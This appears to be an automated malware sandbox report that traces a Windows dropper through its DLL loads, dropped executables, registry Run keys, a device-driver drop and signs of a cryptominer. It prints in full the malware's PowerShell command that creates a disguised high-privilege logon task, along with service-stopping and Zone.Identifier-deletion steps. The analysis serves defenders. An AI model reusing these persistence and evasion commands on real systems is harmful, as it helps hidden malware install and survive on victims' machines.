Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\65841553.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\65841553.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\65841553.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\65841553.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\65841553.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\65841553.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\T52Z708x2p.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: T52Z708x2p.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: C:\Users\user\AppData\Local\Temp\70AF.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll

Jump to behavior

Source: T52Z708x2p.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: T52Z708x2p.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: T52Z708x2p.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: T52Z708x2p.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: T52Z708x2p.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: T52Z708x2p.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: T52Z708x2p.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: F:\src\cef\chromium_git\3538\chromium\src\out\Release_GN_x64\courgette64.exe.pdb source: T52Z708x2p.exe, 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmp, T52Z708x2p.exe, 00000001.00000000.1378716039.0000000140076000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp

Source: T52Z708x2p.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: T52Z708x2p.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: T52Z708x2p.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: T52Z708x2p.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: T52Z708x2p.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\AppData\Local\Temp\2448028260.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

Source: initial sample

Static PE information: section where entry point is pointing to: .zero

Source: sysppvrdnvs.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x232cd
Source: 446629599.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x232cd
Source: 1706633239.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x232cd
Source: newtpp[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x232cd
Source: jacrzswcvuml.tmp.51.dr	Static PE information: real checksum: 0x0 should be: 0x554c2a
Source: T52Z708x2p.exe	Static PE information: real checksum: 0x0 should be: 0xa858f
Source: 1332331323.exe.6.dr	Static PE information: real checksum: 0x6517 should be: 0x659f
Source: 158238779.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xa6a9
Source: 65841553.exe.35.dr	Static PE information: real checksum: 0x6517 should be: 0x659f
Source: sysppvrdnvs.exe.33.dr	Static PE information: real checksum: 0x0 should be: 0x232cd
Source: 193938922.exe.35.dr	Static PE information: real checksum: 0x0 should be: 0xa6a9

Source: T52Z708x2p.exe	Static PE information: section name: .00cfg
Source: T52Z708x2p.exe	Static PE information: section name: .zero
Source: nxmr[1].exe.29.dr	Static PE information: section name: .xdata
Source: 2448028260.exe.29.dr	Static PE information: section name: .xdata
Source: winupsecvmgr.exe.34.dr	Static PE information: section name: .xdata
Source: jacrzswcvuml.tmp.51.dr	Static PE information: section name: _RANDOMX
Source: jacrzswcvuml.tmp.51.dr	Static PE information: section name: _TEXT_CN
Source: jacrzswcvuml.tmp.51.dr	Static PE information: section name: _TEXT_CN
Source: jacrzswcvuml.tmp.51.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Code function: 4_2_00AF1A31 push ecx; ret	4_2_00AF1A44
Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Code function: 27_2_00E81821 push ecx; ret	27_2_00E81834
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Code function: 29_2_00951AD1 push ecx; ret	29_2_00951AE4
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Code function: 32_2_007A1771 push ecx; ret	32_2_007A1784
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFAAC0BD2A5 pushad ; iretd	46_2_00007FFAAC0BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFAAC1D755D push ebx; iretd	46_2_00007FFAAC1D756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFAAC1DD1FB pushfd ; iretd	46_2_00007FFAAC1DD301
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFAAC1DB6F2 pushad ; iretd	46_2_00007FFAAC1DB7D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFAAC1D2705 push eax; iretd	46_2_00007FFAAC1D2733
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFAAC1D7BAA push eax; ret	46_2_00007FFAAC1D7BB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFAAC1D7BD0 push eax; ret	46_2_00007FFAAC1D7BB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFAAC1DDC3B push E85B79B5h; ret	46_2_00007FFAAC1DDCF9
Source: C:\Users\user\AppData\Local\Temp\236013504.exe	Code function: 62_2_00F41821 push ecx; ret	62_2_00F41834
Source: C:\Windows\System32\conhost.exe	Code function: 63_2_00007FF6B6F225AC push rsi; ret	63_2_00007FF6B6F225C6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC08D2A5 pushad ; iretd	64_2_00007FFAAC08D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC1A755D push ebx; iretd	64_2_00007FFAAC1A756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC1A3603 pushad ; ret	64_2_00007FFAAC1A3611
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC1AB6F2 pushad ; iretd	64_2_00007FFAAC1AB7D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC1A7BAA push eax; ret	64_2_00007FFAAC1A7BB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC1AB7D2 pushad ; iretd	64_2_00007FFAAC1AB7D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC1A7BD0 push eax; ret	64_2_00007FFAAC1A7BB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFAAC1A089D push E95B7D1Ch; ret	64_2_00007FFAAC1A0909
Source: C:\Users\user\AppData\Local\Temp\65841553.exe	Code function: 67_2_00E31AD1 push ecx; ret	67_2_00E31AE4

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe

Executable created and started: C:\Windows\sysppvrdnvs.exe

Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe

File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	File created: C:\Windows\sysppvrdnvs.exe	Jump to dropped file
Source: C:\Windows\sysppvrdnvs.exe	File created: C:\Users\user\AppData\Local\Temp\281653412.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	File created: C:\Users\user\sysppvrdnvs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\T52Z708x2p.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pei[1].exe	Jump to dropped file
Source: C:\Users\user\sysppvrdnvs.exe	File created: C:\Users\user\AppData\Local\Temp\65841553.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	File created: C:\Users\user\AppData\Local\Temp\1706633239.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	File created: C:\Users\user\AppData\Local\Temp\2448028260.exe	Jump to dropped file
Source: C:\Windows\sysppvrdnvs.exe	File created: C:\Users\user\AppData\Local\Temp\2311326414.exe	Jump to dropped file
Source: C:\Users\user\sysppvrdnvs.exe	File created: C:\Users\user\AppData\Local\Temp\236013504.exe	Jump to dropped file
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	File created: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	Jump to dropped file
Source: C:\Users\user\sysppvrdnvs.exe	File created: C:\Users\user\AppData\Local\Temp\193938922.exe	Jump to dropped file
Source: C:\Windows\sysppvrdnvs.exe	File created: C:\Users\user\AppData\Local\Temp\158238779.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nxmr[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe	Jump to dropped file
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys	Jump to dropped file
Source: C:\Users\user\Desktop\T52Z708x2p.exe	File created: C:\Users\user\AppData\Local\Temp\70AF.exe	Jump to dropped file
Source: C:\Windows\sysppvrdnvs.exe	File created: C:\Users\user\AppData\Local\Temp\1332331323.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2448028260.exe	File created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Jump to dropped file
Source: C:\Users\user\sysppvrdnvs.exe	File created: C:\Users\user\AppData\Local\Temp\1378231302.exe	Jump to dropped file
Source: C:\Windows\sysppvrdnvs.exe	File created: C:\Users\user\AppData\Local\Temp\446629599.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\446629599.exe

File created: C:\Users\user\sysppvrdnvs.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe

File created: C:\Windows\sysppvrdnvs.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\AppData\Local\Temp\446629599.exe

File created: C:\Users\user\sysppvrdnvs.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"

Source: C:\Windows\sysppvrdnvs.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Settings
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JACRZSWCVUML.TMP
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JACRZSWCVUML.TMP

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\T52Z708x2p.exe	File opened: C:\Users\user~1\AppData\Local\Temp\70AF.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	File opened: C:\Users\user~1\AppData\Local\Temp\1706633239.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	File opened: C:\Users\user~1\AppData\Local\Temp\1706633239.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	File opened: C:\Windows\sysppvrdnvs.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\565511239.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\1121631426.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\158238779.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\281653412.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\1332331323.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\2311326414.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\446629599.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	File opened: C:\Users\user~1\AppData\Local\Temp\2448028260.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	File opened: C:\Users\user~1\AppData\Local\Temp\446629599.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysppvrdnvs.exe	File opened: C:\Users\user\sysppvrdnvs.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\251299760.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\2234110106.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\193938922.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\236013504.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\65841553.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\sysppvrdnvs.exe	File opened: C:\Users\user~1\AppData\Local\Temp\1378231302.exe:Zone.Identifier read attributes \| delete

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
